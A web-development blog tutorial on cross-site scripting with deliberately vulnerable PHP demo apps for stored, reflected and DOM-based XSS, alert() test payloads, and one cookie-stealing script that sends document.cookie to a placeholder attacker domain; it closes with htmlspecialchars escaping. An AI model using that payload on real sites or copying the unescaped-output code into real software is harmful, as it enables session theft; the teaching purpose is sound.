Source: https://tienminhvy.com/kinh-nghiem/xss-la-gi-va-cach-phong-tranh
XSS is one of the well-known security vulnerabilities, unlike SQL injection, the XSS vulnerability is mainly implemented on the client side, in order to steal user information.
What is XSS? XSS at a glance
XSS (which stands for Cross-Site Scripting) is simply understood as a common malware attack in which hackers take advantage of vulnerabilities to insert script code, then send them to people. using (or a user accidentally accessing an infected site). Thereby stealing the user’s cookie information and using it to login accounts on the website that were infected with malicious code.
This is a simple attack but causes great damage to websites such as banking, e-commerce. At the same time, this is also a security issue to consider when programming a web application.
How dangerous is XSS?
As I mentioned above, XSS is extremely dangerous because it causes a lot of damage to a website, especially a business website, when a website is attacked by XSS, it will damage both the website owner and also the users on that website, making that website’s reputation decline. In addition, the hacker can use the user’s account for fraudulent purposes, …
Some of the famous XSS attacks:
Classification and examples of XSS
Currently, there are 3 main types of XSS:
Stored XSS
Stored XSS is the basic XSS vulnerability commonly found in unsecured web applications, with this bug taking advantage of the location where it was discovered (such as a comment form or support page. website technical support, …). Then send this malicious code to the database side and store there.
When the victim accesses the comment page, the system will take all comments (including the comments infected with malicious code of the hacker) and print them out on the screen, as soon as the page loading process is complete, the web browser of the user will execute the malicious code (depending on what kind of malicious code the hacker inserted, such as the malicious code that collects the user’s cookies).
Here is a small web application I wrote to use to demo for you what is Stored XSS (only for learning and demo purposes only):
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 | <span class="token php language-php"><span class="token delimiter important"><?php</span> <span class="token comment">// Bản quyền © 2020 bởi tienminhvy.com, bảo lưu mọi quyền</span> <span class="token comment">// Vui lòng ghi nguồn nếu chia sẻ lại</span> <span class="token variable">$db</span> <span class="token operator">=</span> <span class="token function">mysqli_connect</span> <span class="token punctuation">(</span> <span class="token single-quoted-string string">'localhost'</span> <span class="token punctuation">,</span> <span class="token single-quoted-string string">'root'</span> <span class="token punctuation">,</span> <span class="token single-quoted-string string">''</span> <span class="token punctuation">,</span> <span class="token single-quoted-string string">'xss'</span> <span class="token punctuation">,</span> <span class="token number">3306</span> <span class="token punctuation">)</span> <span class="token punctuation">;</span> <span class="token keyword">if</span> <span class="token punctuation">(</span> <span class="token operator">!</span> <span class="token variable">$db</span> <span class="token punctuation">)</span> <span class="token punctuation">{</span> <span class="token keyword">die</span> <span class="token punctuation">(</span> <span class="token double-quoted-string string">"<h1>Không thể kết nối đến cơ sở dữ liệu!<h1>"</span> <span class="token punctuation">)</span> <span class="token punctuation">;</span> <span class="token punctuation">}</span> <span class="token keyword">if</span> <span class="token punctuation">(</span> <span class="token keyword">isset</span> <span class="token punctuation">(</span> <span class="token variable">$_POST</span> <span class="token punctuation">[</span> <span class="token single-quoted-string string">'username'</span> <span class="token punctuation">]</span> <span class="token punctuation">)</span> <span class="token punctuation">)</span> <span class="token punctuation">{</span> <span class="token variable">$username</span> <span class="token operator">=</span> <span class="token function">mysqli_real_escape_string</span> <span class="token punctuation">(</span> <span class="token variable">$db</span> <span class="token punctuation">,</span> <span class="token variable">$_POST</span> <span class="token punctuation">[</span> <span class="token single-quoted-string string">'username'</span> <span class="token punctuation">]</span> <span class="token punctuation">)</span> <span class="token punctuation">;</span> <span class="token variable">$msg</span> <span class="token operator">=</span> <span class="token function">mysqli_real_escape_string</span> <span class="token punctuation">(</span> <span class="token variable">$db</span> <span class="token punctuation">,</span> <span class="token variable">$_POST</span> <span class="token punctuation">[</span> <span class="token single-quoted-string string">'msg'</span> <span class="token punctuation">]</span> <span class="token punctuation">)</span> <span class="token punctuation">;</span> <span class="token variable">$status</span> <span class="token operator">=</span> <span class="token function">mysqli_query</span> <span class="token punctuation">(</span> <span class="token variable">$db</span> <span class="token punctuation">,</span> <span class="token double-quoted-string string">"INSERT INTO msg (username, msg) VALUES (' <span class="token interpolation"><span class="token variable">$username</span></span> ', ' <span class="token interpolation"><span class="token variable">$msg</span></span> ')"</span> <span class="token punctuation">)</span> <span class="token punctuation">;</span> <span class="token keyword">if</span> <span class="token punctuation">(</span> <span class="token operator">!</span> <span class="token variable">$status</span> <span class="token punctuation">)</span> <span class="token punctuation">{</span> <span class="token keyword">die</span> <span class="token punctuation">(</span> <span class="token double-quoted-string string">"ERROR"</span> <span class="token punctuation">)</span> <span class="token punctuation">;</span> <span class="token punctuation">}</span> <span class="token keyword">else</span> <span class="token punctuation">{</span> <span class="token function">header</span> <span class="token punctuation">(</span> <span class="token double-quoted-string string">"Refresh: 0"</span> <span class="token punctuation">)</span> <span class="token punctuation">;</span> <span class="token punctuation">}</span> <span class="token punctuation">}</span> <span class="token variable">$result</span> <span class="token operator">=</span> <span class="token function">mysqli_query</span> <span class="token punctuation">(</span> <span class="token variable">$db</span> <span class="token punctuation">,</span> <span class="token double-quoted-string string">"SELECT * FROM msg"</span> <span class="token punctuation">)</span> <span class="token punctuation">;</span> <span class="token variable">$content</span> <span class="token operator">=</span> <span class="token single-quoted-string string">''</span> <span class="token punctuation">;</span> <span class="token keyword">if</span> <span class="token punctuation">(</span> <span class="token function">mysqli_num_rows</span> <span class="token punctuation">(</span> <span class="token variable">$result</span> <span class="token punctuation">)</span> <span class="token operator">></span> <span class="token number">0</span> <span class="token punctuation">)</span> <span class="token punctuation">{</span> <span class="token keyword">while</span> <span class="token punctuation">(</span> <span class="token variable">$row</span> <span class="token operator">=</span> <span class="token function">mysqli_fetch_assoc</span> <span class="token punctuation">(</span> <span class="token variable">$result</span> <span class="token punctuation">)</span> <span class="token punctuation">)</span> <span class="token punctuation">{</span> <span class="token variable">$content</span> <span class="token punctuation">.</span> <span class="token operator">=</span> <span class="token operator"><</span> <span class="token operator"><</span> <span class="token operator"><</span> <span class="token constant">HTML</span> <span class="token operator"><</span> div <span class="token keyword">class</span> <span class="token operator">=</span> <span class="token double-quoted-string string">"cmt"</span> <span class="token operator">></span> <span class="token operator"><</span> p <span class="token keyword">class</span> <span class="token operator">=</span> <span class="token double-quoted-string string">"cmt-username"</span> <span class="token operator">></span> Username <span class="token punctuation">:</span> <span class="token operator"><</span> b <span class="token operator">></span> @ <span class="token variable">$row</span> <span class="token punctuation">[</span> username <span class="token punctuation">]</span> <span class="token operator"><</span> <span class="token operator">/</span> b <span class="token operator">></span> <span class="token operator"><</span> <span class="token operator">/</span> p <span class="token operator">></span> <span class="token operator"><</span> p <span class="token keyword">class</span> <span class="token operator">=</span> <span class="token double-quoted-string string">"cmt-msg"</span> <span class="token operator">></span> <span class="token constant">MSG</span> <span class="token punctuation">:</span> <span class="token operator">></span> <span class="token variable">$row</span> <span class="token punctuation">[</span> msg <span class="token punctuation">]</span> <span class="token operator"><</span> <span class="token operator">/</span> p <span class="token operator">></span> <span class="token operator"><</span> div <span class="token keyword">class</span> <span class="token operator">=</span> <span class="token double-quoted-string string">"cmt-time"</span> <span class="token operator">></span> Time <span class="token punctuation">:</span> <span class="token variable">$row</span> <span class="token punctuation">[</span> time <span class="token punctuation">]</span> <span class="token operator"><</span> <span class="token operator">/</span> div <span class="token operator">></span> <span class="token operator"><</span> <span class="token operator">/</span> div <span class="token operator">></span> <span class="token constant">HTML</span> <span class="token punctuation">;</span> <span class="token punctuation">}</span> <span class="token punctuation">}</span> <span class="token delimiter important">?></span></span> <span class="token doctype"><!DOCTYPE html></span> <span class="token tag"><span class="token tag"><span class="token punctuation"><</span> html</span> <span class="token attr-name">lang</span> <span class="token attr-value"><span class="token punctuation">=</span> <span class="token punctuation">"</span> en <span class="token punctuation">"</span></span> <span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation"><</span> head</span> <span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation"><</span> meta</span> <span class="token attr-name">charset</span> <span class="token attr-value"><span class="token punctuation">=</span> <span class="token punctuation">"</span> UTF-8 <span class="token punctuation">"</span></span> <span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation"><</span> meta</span> <span class="token attr-name">name</span> <span class="token attr-value"><span class="token punctuation">=</span> <span class="token punctuation">"</span> viewport <span class="token punctuation">"</span></span> <span class="token attr-name">content</span> <span class="token attr-value"><span class="token punctuation">=</span> <span class="token punctuation">"</span> width=device-width, initial-scale=1.0 <span class="token punctuation">"</span></span> <span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation"><</span> title</span> <span class="token punctuation">></span></span> Bình luận - XYZ <span class="token tag"><span class="token tag"><span class="token punctuation"></</span> title</span> <span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation"></</span> head</span> <span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation"><</span> body</span> <span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation"><</span> div</span> <span class="token attr-name">class</span> <span class="token attr-value"><span class="token punctuation">=</span> <span class="token punctuation">"</span> cmt-section <span class="token punctuation">"</span></span> <span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation"><</span> h2</span> <span class="token punctuation">></span></span> Comment Section <span class="token tag"><span class="token tag"><span class="token punctuation"></</span> h2</span> <span class="token punctuation">></span></span> <span class="token php language-php"><span class="token delimiter important"><?php</span> <span class="token keyword">echo</span> <span class="token variable">$content</span> <span class="token delimiter important">?></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation"></</span> div</span> <span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation"><</span> div</span> <span class="token attr-name">class</span> <span class="token attr-value"><span class="token punctuation">=</span> <span class="token punctuation">"</span> cmt-form <span class="token punctuation">"</span></span> <span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation"><</span> form</span> <span class="token attr-name">method</span> <span class="token attr-value"><span class="token punctuation">=</span> <span class="token punctuation">'</span> POST <span class="token punctuation">'</span></span> <span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation"><</span> h2</span> <span class="token punctuation">></span></span> Comment Form <span class="token tag"><span class="token tag"><span class="token punctuation"></</span> h2</span> <span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation"><</span> input</span> <span class="token attr-name">type</span> <span class="token attr-value"><span class="token punctuation">=</span> <span class="token punctuation">"</span> text <span class="token punctuation">"</span></span> <span class="token attr-name">name</span> <span class="token attr-value"><span class="token punctuation">=</span> <span class="token punctuation">"</span> username <span class="token punctuation">"</span></span> <span class="token attr-name">placeholder</span> <span class="token attr-value"><span class="token punctuation">=</span> <span class="token punctuation">"</span> Your username <span class="token punctuation">"</span></span> <span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation"><</span> br</span> <span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation"><</span> textarea</span> <span class="token attr-name">name</span> <span class="token attr-value"><span class="token punctuation">=</span> <span class="token punctuation">"</span> msg <span class="token punctuation">"</span></span> <span class="token attr-name">cols</span> <span class="token attr-value"><span class="token punctuation">=</span> <span class="token punctuation">"</span> 30 <span class="token punctuation">"</span></span> <span class="token attr-name">rows</span> <span class="token attr-value"><span class="token punctuation">=</span> <span class="token punctuation">"</span> 10 <span class="token punctuation">"</span></span> <span class="token attr-name">placeholder</span> <span class="token attr-value"><span class="token punctuation">=</span> <span class="token punctuation">"</span> Your comment here <span class="token punctuation">"</span></span> <span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation"></</span> textarea</span> <span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation"><</span> button</span> <span class="token attr-name">type</span> <span class="token attr-value"><span class="token punctuation">=</span> <span class="token punctuation">"</span> submit <span class="token punctuation">"</span></span> <span class="token punctuation">></span></span> Send <span class="token tag"><span class="token tag"><span class="token punctuation"></</span> button</span> <span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation"></</span> form</span> <span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation"></</span> div</span> <span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation"></</span> body</span> <span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation"></</span> html</span> <span class="token punctuation">></span></span> |
If you want to know what the function of mysqli_real_escape_string () function is for, you can see this article: What is SQL Injection and how to prevent it?
The small web app example above is the comments section of a blog page, where users can enter comments with whatever they want. And I’m just an ordinary user to go to the comment section of the website to express his opinion with the website owner.
Because my personality is a bit naughty, I will try to see if this comment item has any security holes, after checking for the unsuccessful SQL injection, I turn to testing the XSS error by entering the <script> line. </script> enter.
And unexpectedly, the MSG I bolded, I couldn’t see the message I entered, I checked the source code of the page by pressing Ctrl + U
Well, you see my line is bold, it proves to us that the website has XSS type 1 security vulnerability already. To make sure that the javascript code can be executed in the script tag pair, right in the comment form, I enter this line and click Send.
1 2 | <span class="token tag"><span class="token tag"><span class="token punctuation"><</span> script</span> <span class="token punctuation">></span></span> <span class="token script"><span class="token language-javascript"><span class="token function">alert</span> <span class="token punctuation">(</span> <span class="token string">'Hacked!'</span> <span class="token punctuation">)</span></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation"></</span> script</span> <span class="token punctuation">></span></span> |
And if the website is reporting like this, it is 100% sure that this website has XSS error.
And here is our javascript snippet in the source code of the web page.
With this vulnerability, hackers can take advantage of it to steal cookies, in order to use these cookies to impersonate users to log in to the website above. Or more dangerous than using it to DDOS any other website. For example, I will take advantage of it to steal cookie information of users who visit this comment page, I will use the following javascript:
1 2 | <span class="token tag"><span class="token tag"><span class="token punctuation"><</span> script</span> <span class="token punctuation">></span></span> <span class="token script"><span class="token language-javascript">window <span class="token punctuation">.</span> location <span class="token punctuation">.</span> <span class="token function">assign</span> <span class="token punctuation">(</span> <span class="token string">"https://www.sitecuahacker.com/?cookie="</span> <span class="token operator">+</span> document <span class="token punctuation">.</span> cookie <span class="token punctuation">)</span></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation"></</span> script</span> <span class="token punctuation">></span></span> |
And all cookies of the user when accessing the above site will be redirected to his page both: v. Of course, who would do that )
So what is the difference between this type of Stored XSS and the other 2 Reflected XSS types? With this type of XSS, hackers will not need to use tricks to trick users into accessing the website because the above malicious code has been stored on the database. When a user visits that area, the website will both load the malicious code and execute it in the user’s web browser.
Reflected XSS
This is also a type of XSS, but the difference with the above type is that it can only be executed on the client side (user browser) and not saved to the database of the website. If you want to exploit this bug, the hacker needs to find the vulnerability in the web application, and then look up the link pointing to the website containing the vulnerability.
Once the user accesses the above link, the server will return the website with the hacker’s malicious code included in the link.
For example, the small web application below I wrote to find the user who sent a message to the website above (note that it is only used for learning, demo purposes):
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 | <span class="token php language-php"><span class="token delimiter important"><?php</span> <span class="token comment">// Bản quyền © 2020 bởi tienminhvy.com, bảo lưu mọi quyền</span> <span class="token comment">// Vui lòng ghi nguồn nếu chia sẻ lại</span> <span class="token variable">$db</span> <span class="token operator">=</span> <span class="token function">mysqli_connect</span> <span class="token punctuation">(</span> <span class="token single-quoted-string string">'localhost'</span> <span class="token punctuation">,</span> <span class="token single-quoted-string string">'root'</span> <span class="token punctuation">,</span> <span class="token single-quoted-string string">''</span> <span class="token punctuation">,</span> <span class="token single-quoted-string string">'xss'</span> <span class="token punctuation">,</span> <span class="token number">3306</span> <span class="token punctuation">)</span> <span class="token punctuation">;</span> <span class="token keyword">if</span> <span class="token punctuation">(</span> <span class="token operator">!</span> <span class="token variable">$db</span> <span class="token punctuation">)</span> <span class="token punctuation">{</span> <span class="token keyword">die</span> <span class="token punctuation">(</span> <span class="token double-quoted-string string">"<h1>Không thể kết nối đến cơ sở dữ liệu!<h1>"</span> <span class="token punctuation">)</span> <span class="token punctuation">;</span> <span class="token punctuation">}</span> <span class="token variable">$content</span> <span class="token operator">=</span> <span class="token single-quoted-string string">''</span> <span class="token punctuation">;</span> <span class="token variable">$username</span> <span class="token operator">=</span> <span class="token single-quoted-string string">''</span> <span class="token punctuation">;</span> <span class="token variable">$usf</span> <span class="token operator">=</span> <span class="token single-quoted-string string">''</span> <span class="token punctuation">;</span> <span class="token variable">$result</span> <span class="token operator">=</span> <span class="token punctuation">(</span> object <span class="token punctuation">)</span> <span class="token keyword">array</span> <span class="token punctuation">(</span> <span class="token single-quoted-string string">'num_rows'</span> <span class="token operator">=</span> <span class="token operator">></span> <span class="token number">0</span> <span class="token punctuation">)</span> <span class="token punctuation">;</span> <span class="token keyword">if</span> <span class="token punctuation">(</span> <span class="token keyword">isset</span> <span class="token punctuation">(</span> <span class="token variable">$_GET</span> <span class="token punctuation">[</span> <span class="token single-quoted-string string">'username'</span> <span class="token punctuation">]</span> <span class="token punctuation">)</span> <span class="token punctuation">)</span> <span class="token punctuation">{</span> <span class="token variable">$usf</span> <span class="token operator">=</span> <span class="token single-quoted-string string">'<p>You searched for "'</span> <span class="token punctuation">.</span> <span class="token variable">$_GET</span> <span class="token punctuation">[</span> <span class="token single-quoted-string string">'username'</span> <span class="token punctuation">]</span> <span class="token punctuation">.</span> <span class="token single-quoted-string string">'"</p>'</span> <span class="token punctuation">;</span> <span class="token variable">$username</span> <span class="token operator">=</span> <span class="token function">mysqli_real_escape_string</span> <span class="token punctuation">(</span> <span class="token variable">$db</span> <span class="token punctuation">,</span> <span class="token variable">$_GET</span> <span class="token punctuation">[</span> <span class="token single-quoted-string string">'username'</span> <span class="token punctuation">]</span> <span class="token punctuation">)</span> <span class="token punctuation">;</span> <span class="token variable">$result</span> <span class="token operator">=</span> <span class="token function">mysqli_query</span> <span class="token punctuation">(</span> <span class="token variable">$db</span> <span class="token punctuation">,</span> <span class="token double-quoted-string string">"SELECT * FROM msg WHERE username=' <span class="token interpolation"><span class="token variable">$username</span></span> '"</span> <span class="token punctuation">)</span> <span class="token punctuation">;</span> <span class="token keyword">if</span> <span class="token punctuation">(</span> <span class="token function">mysqli_num_rows</span> <span class="token punctuation">(</span> <span class="token variable">$result</span> <span class="token punctuation">)</span> <span class="token operator">></span> <span class="token number">0</span> <span class="token punctuation">)</span> <span class="token punctuation">{</span> <span class="token keyword">while</span> <span class="token punctuation">(</span> <span class="token variable">$row</span> <span class="token operator">=</span> <span class="token function">mysqli_fetch_assoc</span> <span class="token punctuation">(</span> <span class="token variable">$result</span> <span class="token punctuation">)</span> <span class="token punctuation">)</span> <span class="token punctuation">{</span> <span class="token variable">$content</span> <span class="token punctuation">.</span> <span class="token operator">=</span> <span class="token operator"><</span> <span class="token operator"><</span> <span class="token operator"><</span> <span class="token constant">HTML</span> <span class="token operator"><</span> div <span class="token keyword">class</span> <span class="token operator">=</span> <span class="token double-quoted-string string">"cmt"</span> <span class="token operator">></span> <span class="token operator"><</span> p <span class="token keyword">class</span> <span class="token operator">=</span> <span class="token double-quoted-string string">"cmt-username"</span> <span class="token operator">></span> Username <span class="token punctuation">:</span> <span class="token operator"><</span> b <span class="token operator">></span> @ <span class="token variable">$row</span> <span class="token punctuation">[</span> username <span class="token punctuation">]</span> <span class="token operator"><</span> <span class="token operator">/</span> b <span class="token operator">></span> <span class="token operator"><</span> <span class="token operator">/</span> p <span class="token operator">></span> <span class="token operator"><</span> p <span class="token keyword">class</span> <span class="token operator">=</span> <span class="token double-quoted-string string">"cmt-msg"</span> <span class="token operator">></span> <span class="token constant">MSG</span> <span class="token punctuation">:</span> <span class="token operator">></span> <span class="token variable">$row</span> <span class="token punctuation">[</span> msg <span class="token punctuation">]</span> <span class="token operator"><</span> <span class="token operator">/</span> p <span class="token operator">></span> <span class="token operator"><</span> div <span class="token keyword">class</span> <span class="token operator">=</span> <span class="token double-quoted-string string">"cmt-time"</span> <span class="token operator">></span> Time <span class="token punctuation">:</span> <span class="token variable">$row</span> <span class="token punctuation">[</span> time <span class="token punctuation">]</span> <span class="token operator"><</span> <span class="token operator">/</span> div <span class="token operator">></span> <span class="token operator"><</span> <span class="token operator">/</span> div <span class="token operator">></span> <span class="token constant">HTML</span> <span class="token punctuation">;</span> <span class="token punctuation">}</span> <span class="token punctuation">}</span> <span class="token keyword">else</span> <span class="token punctuation">{</span> <span class="token variable">$content</span> <span class="token operator">=</span> <span class="token double-quoted-string string">"Not Found!"</span> <span class="token punctuation">;</span> <span class="token punctuation">}</span> <span class="token punctuation">}</span> <span class="token delimiter important">?></span></span> <span class="token doctype"><!DOCTYPE html></span> <span class="token tag"><span class="token tag"><span class="token punctuation"><</span> html</span> <span class="token attr-name">lang</span> <span class="token attr-value"><span class="token punctuation">=</span> <span class="token punctuation">"</span> en <span class="token punctuation">"</span></span> <span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation"><</span> head</span> <span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation"><</span> meta</span> <span class="token attr-name">charset</span> <span class="token attr-value"><span class="token punctuation">=</span> <span class="token punctuation">"</span> UTF-8 <span class="token punctuation">"</span></span> <span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation"><</span> meta</span> <span class="token attr-name">name</span> <span class="token attr-value"><span class="token punctuation">=</span> <span class="token punctuation">"</span> viewport <span class="token punctuation">"</span></span> <span class="token attr-name">content</span> <span class="token attr-value"><span class="token punctuation">=</span> <span class="token punctuation">"</span> width=device-width, initial-scale=1.0 <span class="token punctuation">"</span></span> <span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation"><</span> title</span> <span class="token punctuation">></span></span> Bình luận - XYZ <span class="token tag"><span class="token tag"><span class="token punctuation"></</span> title</span> <span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation"></</span> head</span> <span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation"><</span> body</span> <span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation"><</span> form</span> <span class="token attr-name">method</span> <span class="token attr-value"><span class="token punctuation">=</span> <span class="token punctuation">'</span> GET <span class="token punctuation">'</span></span> <span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation"><</span> input</span> <span class="token attr-name">value</span> <span class="token attr-value"><span class="token punctuation">=</span> <span class="token punctuation">'</span> <span class="token php language-php"><span class="token delimiter important"><?php</span> <span class="token keyword">echo</span> <span class="token variable">$username</span> <span class="token delimiter important">?></span></span> <span class="token punctuation">'</span></span> <span class="token attr-name">type</span> <span class="token attr-value"><span class="token punctuation">=</span> <span class="token punctuation">"</span> text <span class="token punctuation">"</span></span> <span class="token attr-name">name</span> <span class="token attr-value"><span class="token punctuation">=</span> <span class="token punctuation">"</span> username <span class="token punctuation">"</span></span> <span class="token attr-name">placeholder</span> <span class="token attr-value"><span class="token punctuation">=</span> <span class="token punctuation">"</span> Please username which you want to find <span class="token punctuation">"</span></span> <span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation"><</span> button</span> <span class="token attr-name">type</span> <span class="token attr-value"><span class="token punctuation">=</span> <span class="token punctuation">"</span> submit <span class="token punctuation">"</span></span> <span class="token punctuation">></span></span> Find <span class="token tag"><span class="token tag"><span class="token punctuation"></</span> button</span> <span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation"></</span> form</span> <span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation"><</span> div</span> <span class="token attr-name">class</span> <span class="token attr-value"><span class="token punctuation">=</span> <span class="token punctuation">"</span> usf <span class="token punctuation">"</span></span> <span class="token punctuation">></span></span> <span class="token php language-php"><span class="token delimiter important"><?php</span> <span class="token keyword">echo</span> <span class="token variable">$usf</span> <span class="token delimiter important">?></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation"></</span> div</span> <span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation"><</span> div</span> <span class="token attr-name">class</span> <span class="token attr-value"><span class="token punctuation">=</span> <span class="token punctuation">"</span> comment-section <span class="token punctuation">"</span></span> <span class="token punctuation">></span></span> <span class="token php language-php"><span class="token delimiter important"><?php</span> <span class="token keyword">echo</span> <span class="token variable">$content</span> <span class="token delimiter important">?></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation"></</span> div</span> <span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation"></</span> body</span> <span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation"></</span> html</span> <span class="token punctuation">></span></span> |
For example, on this page, users can search for messages (comments) that they or other users have posted on the website.
For example, here, I search for a user named abc, then click Find, the website will return all comments of the user abc.
And when I do not enter any characters in the box and click Find, the system will return the page as below, but still show the line You searched for “”.
Therefore, here I will check to see if the website owner properly encodes the script tag or not by entering the <script> </script> content box and the website still returns the content as shown above.
However, when I pressed the Ctrl + U key combination, I caught my eye that the line I had highlighted in black here, it is possible that this website has suffered an XSS security error.
However, that is not enough, I will add an alert function to see if the site shows any notification. And when entering the following code in the box, press Enter:
<script> alert (‘Hacked!’) </script>
And I got the results as shown, so 100% of this website had Reflected XSS security error:
And here is the code that we entered in the Source Code section of our website.
DOM-based XSS
DOM-based XSS is an advanced XSS vulnerability, which is also the fault of website owners not properly encrypting user input. However, unlike the two types above, the hacker will not exploit this error through the input box on the website, but will manipulate directly on the browser’s address bar. This malware spread is similar to Reflected XSS.
This type of vulnerability can occur in both dynamic and static websites because this kind of vulnerability takes advantage of JavaScript programming language loosely by programmers to manipulate DOM (Document Object Model), thus This vulnerability can only affect the client (user browser) only.
For example, here is the source code of a demo website written by me:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 | <span class="token doctype"><!DOCTYPE html></span> <span class="token tag"><span class="token tag"><span class="token punctuation"><</span> html</span> <span class="token attr-name">lang</span> <span class="token attr-value"><span class="token punctuation">=</span> <span class="token punctuation">"</span> en <span class="token punctuation">"</span></span> <span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation"><</span> head</span> <span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation"><</span> meta</span> <span class="token attr-name">charset</span> <span class="token attr-value"><span class="token punctuation">=</span> <span class="token punctuation">"</span> UTF-8 <span class="token punctuation">"</span></span> <span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation"><</span> meta</span> <span class="token attr-name">name</span> <span class="token attr-value"><span class="token punctuation">=</span> <span class="token punctuation">"</span> viewport <span class="token punctuation">"</span></span> <span class="token attr-name">content</span> <span class="token attr-value"><span class="token punctuation">=</span> <span class="token punctuation">"</span> width=device-width, initial-scale=1.0 <span class="token punctuation">"</span></span> <span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation"><</span> title</span> <span class="token punctuation">></span></span> Document <span class="token tag"><span class="token tag"><span class="token punctuation"></</span> title</span> <span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation"></</span> head</span> <span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation"><</span> body</span> <span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation"><</span> script</span> <span class="token punctuation">></span></span> <span class="token script"><span class="token language-javascript"> document <span class="token punctuation">.</span> <span class="token function">write</span> <span class="token punctuation">(</span> <span class="token string">"<b>Current URL</b> : "</span> <span class="token operator">+</span> document <span class="token punctuation">.</span> baseURI <span class="token punctuation">)</span> <span class="token punctuation">;</span> </span></span> <span class="token tag"><span class="token tag"><span class="token punctuation"></</span> script</span> <span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation"></</span> body</span> <span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation"></</span> html</span> <span class="token punctuation">></span></span> |
For example, when I open the website above, it will return the link in the address bar that I visited. And when I enter the URL format as follows
http://localhost/hoctap/xss_3.php#<script>alert('XSS')</script>
the website immediately has XSS error.
However, it seems that current web browsers have prevented this type of vulnerability by escaping the above string to normal characters, so the above method is no longer effective for new browsers, but older browsers. There is still a risk of making that security mistake!
How to avoid XSS
To limit and avoid XSS errors, you need to encode special characters when programming a web application. For PHP or Server-side execution language, if possible, you should encode both types as follows:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 | <span class="token php language-php"><span class="token delimiter important"><?php</span> <span class="token comment">// Bản quyền © 2020 bởi tienminhvy.com, bảo lưu mọi quyền</span> <span class="token comment">// Vui lòng ghi nguồn nếu chia sẻ lại</span> <span class="token variable">$db</span> <span class="token operator">=</span> <span class="token function">mysqli_connect</span> <span class="token punctuation">(</span> <span class="token single-quoted-string string">'localhost'</span> <span class="token punctuation">,</span> <span class="token single-quoted-string string">'root'</span> <span class="token punctuation">,</span> <span class="token single-quoted-string string">''</span> <span class="token punctuation">,</span> <span class="token single-quoted-string string">'xss'</span> <span class="token punctuation">,</span> <span class="token number">3306</span> <span class="token punctuation">)</span> <span class="token punctuation">;</span> <span class="token keyword">if</span> <span class="token punctuation">(</span> <span class="token operator">!</span> <span class="token variable">$db</span> <span class="token punctuation">)</span> <span class="token punctuation">{</span> <span class="token keyword">die</span> <span class="token punctuation">(</span> <span class="token double-quoted-string string">"<h1>Không thể kết nối đến cơ sở dữ liệu!<h1>"</span> <span class="token punctuation">)</span> <span class="token punctuation">;</span> <span class="token punctuation">}</span> <span class="token variable">$noidung</span> <span class="token operator">=</span> <span class="token double-quoted-string string">"<script>alert('Hello World!')</script>"</span> <span class="token punctuation">;</span> <span class="token variable">$noidung</span> <span class="token operator">=</span> <span class="token function">htmlspecialchars</span> <span class="token punctuation">(</span> <span class="token variable">$noidung</span> <span class="token punctuation">)</span> <span 